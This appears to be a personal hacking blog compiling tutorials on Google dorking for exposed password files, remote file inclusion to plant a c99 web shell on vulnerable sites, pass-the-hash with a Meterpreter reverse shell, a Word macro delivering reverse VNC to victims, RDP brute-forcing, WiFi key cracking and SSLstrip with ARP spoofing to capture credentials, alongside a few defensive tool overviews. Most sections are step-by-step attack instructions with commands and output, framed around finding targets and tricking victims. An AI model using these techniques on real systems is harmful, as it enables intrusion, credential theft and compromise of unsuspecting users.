Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

TrueCrypt - Protect Sensitive Data

TrueCrypt is an open-source, cross-platform program that allows you to create protected storage volumes, in which you can safely keep your secret files. It's important to understand that TrueCrypt does not selectively encrypt files; rather, it creates a sort of encrypted folder that protects anything in it. This folder, known as a storage volume, must be mounted with TrueCrypt and requires a password to be accessed.

Main features:
  • Creates a virtual encrypted disk within a file and mounts it as a real disk.
  • Encrypts an entire partition or storage device such as USB flash drive or hard drive.
  • Encrypts a partition or drive where Windows is installed (pre-boot authentication).
  • Encryption is automatic, real-time (on-the-fly) and transparent.
  • Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted.
  • Encryption can be hardware-accelerated on modern processors.
  • Provides plausible deniability, in case an adversary forces you to reveal the password
  • Hidden volume (steganography) and hidden operating system. 
Step 1
Download, install and start TrueCrypt

Step 2
True Crypt program window >> Menus bar >> Volumes >> Create New volume ..

Step 3
Follow the instructions of True Crypt Volume Creation Wizard, use defaults:

Choose the name and location of your virtual file:

Use the default AES encryption which is quite strong:

When specifying the size, check the appropriate box Kb, Mb, or Gb, and then enter a number next to it, e.g. 4 Gb or 4096 Mb:

Set a password for your volume. You can use keyfiles such as image file as dual factor authentication:

Check mark if you're gonna be using files larger than 4 Gb:

Use NTFS as the volume format:

Step 4
Finally, when u want to use the disk just select the drive letter and enter your password to mount the encrypted virtual file:

You'll get a hard drive partition at your disposal which can be accessed from your account until you unmount it, reboot, shutdown, log off, or turn the power off.

Google - Hacker's Best Friend

Search engines have for a long time been a good helper of people trying to find sensitive information or vulnerabilities on the web. When you have a few billion documents indexed, it is inevitable some things that should remain private inadvertainly end up in public directories and get indexed, then its just a matter of writing a sufficiently creative search query to find that data.

Google search can be very useful tool for gathering information about the target system. It can be used to locate security vulnerability and misconfiguration. Google hacking on the other hand is the term used when a hacker tries to find vulnerable targets or sensitive data by using the Google search engine.

Here is a list of Google advanced search operators, operator combinations and related uses:

link: URL: lists other pages that link to the URL.
related: URL: lists other pages that related to the URL.
site: restricts search results to the given domain.
allinurl: WORDS: shows only pages with all search term in the url.
inurl: WORDS: like allinurl but filters the URL based on the first term only.
allintitle:WORD: shows only results with terms in title.
intitle:WORD: similar to allintitle, but only for the next word.
cache:URL: will show the Google cached version of the URL.
backlink:URL: will show backlinks and pages containing the url.
filetype: SOMEFILETYPE: will restrict searches to that filetype.
-filetype: SOMEFILETYPE: will remove that file type from the search.
site:"": shows you how many pages of your site are indexed by google.
allintext:: searches only within text of pages, but not in the links or page title
allinlinks:: searches only within links, not text or title
WordA OR WordB: search for either the word A or B.
"Word" OR "Phrase": search exact word or phrase.
WordA-WordB: find word A but filter results that include word B.
WordA+WordB: results much contain both Word A and Word B.
~WORD: looks up the word and its synonyms.
~WORD-WORD: looks up only the synonyms to the word.

Google hacking techniques:

Index of - Using “Index of ” syntax to find sites enabled with Index browsing

Index.of /admin
Index.of /passwd
Index.of /password
Index.of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”

inurl or allinurl - Search google based on the url

inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:gov filetype:xls “restricted”

intitle or allintitle - Search google using the page title

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

Examples usage of google hacking techniques:

Remote Services:
"VNC Desktop" inurl:5800
intitle:"Terminal Services Web Connection"

PhpMyAdmin page
"phpMyAdmin" inurl:"main.php"

Sensitive information filetype:pdf | doc | xls | ppt | txt
filetype:log inurl:"password.log"

Admin page
inurl:admin intitle:login

Music, Video or Ebooks
Find Music:
-inurl:(htm|html|php) intitle:"index of" + "last modified" + "parent directory" + description+size=(wma|mp3) "nirvana"

Find Videos:
-inurl(htm|html|php) intitle:"index of" + "last modified" + "parent directory" +description+size_(mpg|wmv) "matrix"

Find Ebooks:
-inurl(htm|html|php) intitle:"index of" + "last modified" + "parent directory" +description+size_(pdf|doc) "google hacking"

For more examples, you can visit google hacking database here:

Download Google Hacking for Penetration Testers Vol.2 here:

Website Hacking with Remote File Inclusion

Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

First of all we need to find a vulnerable website. We can use the following google dork to search for us:


This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

If after executing the command the homepage of Facebook shows up then the website is vulnerable to this attack, if it does not come up then you should look for a new target.

Once we know that the website is vulnerable to the attack we will now include the c99 shell. To do this download the c99 shell and then upload it to a webhosting site such as, etc.

You can download the c99 here:

Once the shell is uploaded you will have a unique url for your shell lets say it is

Now here is how a hacker would execute the following command to gain access.

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.

Web Browser Security Tests

Browser remains as our main porthole for viewing the web. It’s the main entry point for malware, Trojans, and others browser attacks. In order to ensure that your online activities are protected, you can run the browser security tests to determine how freely private information is being leaked out.

ScanIt puts your browser through 19 vulnerability tests. You can run all tests in one go, choose individual tests, or test for bugs specific to the browser (e.g. Firefox has 10 tests). The browser scanning tool supports Firefox, IE, and Opera. The FAQ will give newbies an idea of why browser vulnerability tests are important and the dangers of browser bugs.

Qualys Browser Check
Qualys uses a plugin to check for exploit weaknesses in the browser. Qualys checks Firefox, Chrome, and Internet Explorer for potential vulnerabilities and security holes in your browser and its plugins. It flags insecure and out-of-date versions that put you at risk with color codes like red for ‘Insecure’, or ‘Obsolete’.

For any item that is insecure or out of date, a Fix It button appears. Simply click the Fix It button to download the latest update to fix your security issue.
A collection of online tests that show you how much personal information can be collected from your browser just by visiting a Web page. can tell you all kinds of detailed information about you and your browser. Information ranging from simple stuff like the name and version of your browser to more detailed stuff like what kind of fonts you have installed and what hardware you’re running on.

PC Flank
The PC Flank Web site incorporates several tests that look at overall computer security as viewed from the Internet. The checks include Stealth Test, Advanced Port Scanner Test, Trojans Test, Exploits Test, and Browser Test. Once more, I want to focus on testing the Web browser. PC Flank tries to determine whether the Web browser gives up any personal information, location details, or specifics about your ISP.

Belarc Advisor - Windows Auditing Tool

The Belarc Advisor builds a detailed profile of your installed software and hardware, missing Microsoft hotfixes, anti-virus status, CIS (Center for Internet Security) benchmarks, and displays the results in your Web browser.

The program creates an HTML report that not only tells you everything you could possibly want to know about the hardware on your system, but also what you might need to know about the software that's installed. Gathered info includes motherboard type and revision, CPU and GPU info, drive space, Microsoft hotfixes, operating system revision, and Web browser vulnerabilities, as well as third-party software installs.

If you are missing any crucial hotfixes, they will appear in the Missing Microsoft Security Hotifixes section. In the Installed Hotfixes section, you can see that the hotfixes are broken out by category and each entry contains the Knowledge Base ID number and the date on which it was installed.

My favorite Belarc Advisor feature by far is its CIS benchmarks. I find it very handy tool for auditing Windows machine. It is very easy to use, very informative, and is a very a nice tool to have in your PC arsenal. Belarc runs on Windows 7, 2008 R2, Vista, 2008, 2003, XP, 2000, NT 4, Me, 98, and 95. Both 32-bit and 64-bit Windows is supported.

You can download Belarc Advisor here:

Pass the Hash Attack with Metasploit

Windows systems usually store the NTLM hash right along with LM hash, where the NTLM hash being more secure. When a system is compromised with an Administrative or System level of access, an attacker will often take a copy of the password hashes for off-line hash-cracking. However, what if the passwords that have been chosen were very strong, and are not crackable in a realistic time-frame?

Sometimes we do not need to crack them. We can simply take the hash as-is and use it as a token to access the system. This technique is called “Pass the Hash”. The same password hashes can be used for authentication, either to the same previously compromised system or to other systems that share the same password.

For example:


Having found that the NTLM hash is not crackable in a reasonable time, by brute force or rainbow tables, we may abandon cracking the hash as unfeasible. However, we could reuse the password hash "as is" to re-authenticate to the Windows system using SMB. Metasploit has a cool tool "exploit/windows/smb/psexec" which authenticates using SMB, uploads and runs a payload. In the following example we use Meterpreter as the payload:

/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 RHOST= SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E

[*] Please wait while we load the module tree...
[*] Started reverse handler on
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \CpdYVAFa.exe...
[*] Binding to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Bound to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (eHIqItmA - "MhEHHIQNUFjnuuJarbnQlnIjpA")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (748544 bytes) to
[*] Closing service handle...
[*] Deleting \CpdYVAFa.exe...
[*] Meterpreter session 1 opened ( ->

meterpreter >

This attack could be used against any system that has an account with the same password and port 445 open. You can watch the video tutorial below:

Terminal Services Brute Force Tools

Terminal services though considered safe are susceptible to brute force attacks. Personally, i have been using TSGrinder to brute force my way into the server. Until recently I found that Ncrack can pretty much do the same thing.

TSGringer is a “dictionary” based attack tool, but it does have some interesting features like “l337″ conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a
username/password combination within a particular connection.

tsgrinder.exe -w dictionary-file -l leet -d workgroup -u administrator -b -n 2 <IP_Address>

You can watch TSGrinder in action here:

The tool is available for download here:

The tool also requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:

Similar to TSGrinder, Ncrack can be used to crack the Remote Desktop Protocol on all Windows versions from XP and above, with the introduction of the RDP module. Keep in mind that against XP machine you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1).

ncrack -vv -d7 CL=10 --user administrator

You can use the -U option for passing a username file and -P for password file. Otherwise, ncrack will use the default password file.

Domain Enumeration Techniques

Sometimes when doing penetration testing, you are provided with very minimum information such as the domain name of the target. Obviously, having one target address will most likely reduce your chances of penetrating the network. One of the techniques you can use to expand your target list is domain enumeration. This technique is used to gather as much information as possible about the target domain.

This method is known as passive information gathering because it is non-intrusive. We are not actively probing the target network but instead using publicly available information on the Internet. There are several ways to do this but I'm going to share with you the ones that I normally used. I would usually start with the online tools to enumerate the target domain. Let say your target domain name is

Google: hacker's best friend
Using search string "allinurl: -www" to return the result of all domain names associated with the target.

Netcraft DNS search function

Checks domains for existing subdomains and hostnames.

Next, I will use enumeration tools that are available in BackTrack.

Tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources.
./ -d -b bing

Multithreaded perl script to enumerate DNS information on a domain and to discover non-contiguous ip blocks.
./ --enum -f dns.txt

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.
 ./fierce -dns -wordlist host.txt

Below you can see a comparison table for result produced from each of the tool.

Next, what we need to do is to validate the result and remove any duplicate records. We started only with one target i.e. but after we have performed domain enumeration, we are presented with plenty of targets to attack.

Cheers :)

Reverse VNC Hidden in a Word File

Metasploit has this payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user. Credits goes to Punter of for this tutorial.

Metasploit will create a macro  which will be embedded in a Word document. When a user opens the Word document, we get a reverse VNC of the target system. It is not required to install VNC on the Victim's PC. You can also do this on WAN but you need to forward port 4444  on your modem or router.

1) Create a Macro to embed in Word

./msfpayload windows/vncinject/reverse_tcp LHOST= V > /tmp/punter.bas

2) Copy that punter.bas file in windows and open msoffice 2003 –>tools–>macro–>visualbasic editor. Then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc. You have to make the document name interesting enough for the victim to open the file. Now send this file to victim via mail or USB.

3) In Backtrack, we have to open a listening port to receive the reverse connection from our victim. 

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

When the victim open the file, it will be asked if he/she wished to accept or not to run the macro. If the user accepts, the connection will be initiated and you will have VNC client opens on Backtack.

You can also watch the video tutorial here:

Wifite - WiFi WEP/WPA Key Cracking Tool

Wifite has been designed specially for the Backtrack4 RC1 distribution of Ubuntu. It helps you to attack multiple WEP and WPA encrypted networks at the same time. This tool is customizable and can be automated with only a few arguments. This is a Python script can be trusted to run without supervision.

  • sorts targets by power (in dB); cracks closest access points first
  • all WPA handshakes are backed up (to’s working directory)
  • mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit)
  • numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • very customizable settings (timeouts, packets/sec, etc)
  • SKA support (untested)
  • finds devices in monitor mode; if none are found, prompts for selection
  • all passwords saved to log.txt
  • switching WEP attacks does not reset IVS
  • displays session summary at exit; shows any cracked keys
GUI mode (default)
Console mode

The tool can be run using the following commands:

Crack all WEP access points:
./ -all -nowpa

Crack all WEP access points with signal strength greater than (or equal to) 50dB:
./ -p 50 -nowpa

Attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:
./ -all --dict /pentest/passwords/wordlists/darkc0de.lst

Attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically:
./ -all -nowpa --dict none

Crack all WEP access points greater than 50dB in strength, giving 15 minutes for each WEP attack method, and send packets at 600 packets/sec:
./ --power 50 -wepw 15 -pps 600

Attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrrupts with ^C):
./ -e "2WIRE752" -wepw 0

 You can download wifite here:

Security 101 - Choosing A Good Password

There are so many things that require passwords these days that remembering them all can be a real problem. Choosing the right password is something that many people find difficult. Maybe because of this reason a lot of people choose their passwords badly. A good password is one that's hard to guess, yet easy for you to remember. This video will show you some simple tips to assist you in choosing a good password.

How to choose a safe password - Explania

Nmap Scripting Engine

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.

Nmap is really my favourite tool for scanning and with this feature added to nmap, it really does make my life easier when doing a lot of scanning. You can check the list of scripts that are currently available in nmap here.

The script can be run with the following command:
nmap -A -T4 --script default -vv

I'm running all scripts under the default category. You can also specify individual script using --script <script name> command.

The script output is shown below the port scan result. More on nmap scripting engine usage and example can be found here.

Ndiff - Utility for Comparing Nmap Scan Results

Ndiff is a tool to aid in the comparison of Nmap scans. Specifically, it compares two nmap scans and outputs the differences. It allows monitoring of your network(s) for interesting changes in port states and visible hosts.

Many people like to scan their networks regularly (daily, weekly, etc.) and then use ndiff to easily detect any changes. The first step is to obtain a baseline of accessible systems and services. The follow-on scans will then identify discrepancies from the baseline, alerting your organisation to these changes.

Ndiff can produce output in human-readable text or machine-readable XML formats. The scans, ndiff run, and emailed report are often automated using tools such as cron on UNIX or the Scheduled Tasks tool on Windows. It should be useful to network administrators, security analysts, and other interested parties who need to monitor large networks in an organised fashion.

You can run Ndiff from Zenmap (GUI based) under the Tools tab

or using the the good old way command line:
ndiff scan1.xml scan2.xml

The highlighted output shows the difference in the scan results. 1st scan shows ssh and telnet ports were opened on host ( but the 2nd scan shows both ports are closed.

SSLstrip - SSL Hijacking Tool

HTTPS can easily be defeated by a MITM, using SSLStrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Here is how the exploit works: right in the middle, the attacker forces the client to operate in an unencrypted mode by stripping the "s" from all the "HTTPS" he will find in the headers/html.

The hacker gets the plain-text credentials, connects to the server via HTTPS using those credentials, gets the response, decrypts it, and forwards that back to the client. Thus, the server is satisfied, since everything is "correctly" encrypted, while the client is forced to use an unencrypted communication channel, without even noticing it.

Basically, these are the things you need to do to get SSLstrip running on BackTrack.

1- Switch the attacker machine into IP forwarding mode so that it can forward the victim's packet to the right address.
    echo "1" > /proc/sys/net/ipv4/ip_forward

2- Setup iptables to redirect HTTP traffic to SSLstrip so that all traffic that is connecting to port 80 will then be redirected to port 10000 (or any other port that you wish to use for e.g. 8080)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

3- Run SSLstrip and log to a file name secret
    python -w secret 

4- Run arpspoof attack between Victim and Gateway
    arpspoof -i eth0 -t

That is really all that we have to do to compromise a network and sniff usernames and passwords. It takes a few commands in a Linux machine to be able to steal your "secure" information.

You can also watch this video tutorial on how to perform SSLstrip attack.

Ncrack - Network Authentication Cracking Tool

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more.

The latest version, ncrack-0.3ALPHA, adds support for two famous protocols – SMB & RDP and it seems to be working pretty well! Using these, you can crack all Microsoft CIFS/SMB services as well as Unix-based Samba servers and crack all Windows RDP servers from XP and above.

Supported modules: SSH, FTP, TELNET, HTTP(S), SMB, RDP, POP3(S)

You can download ncrack here:

theHarvester - Email, User names and Subdomain/Hostnames Finder.

One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc.

theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources. It's a really simple tool, but very effective.
The sources supported are:
  •    Google - emails,subdomains/hostnames
  •    Bing search - emails, subdomains/hostnames
  •    Pgp servers - emails, subdomains/hostnames
  •    Linkedin - user names

Some examples:

Searching emails accounts for the domain, it will work with the first 500 google results:

./ -d -l 500 -b google

Searching emails accounts for the domain in a PGP server, here it's not necessary to specify the limit.

./ -d -b pgp

Searching for user names that works in the company microsoft, we use google as search engine, so we need to specify the limit of results we want to use:

./ -d microsoft -l 200 -b linkedin

 You can download theHarvester here:

Pangolin - Automatic SQL Injection Tool

Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC.
Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user"s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Database support:
Access, DB2,Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3,Sybase.

More video tutorials here:

 You can download the free edition here:

Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!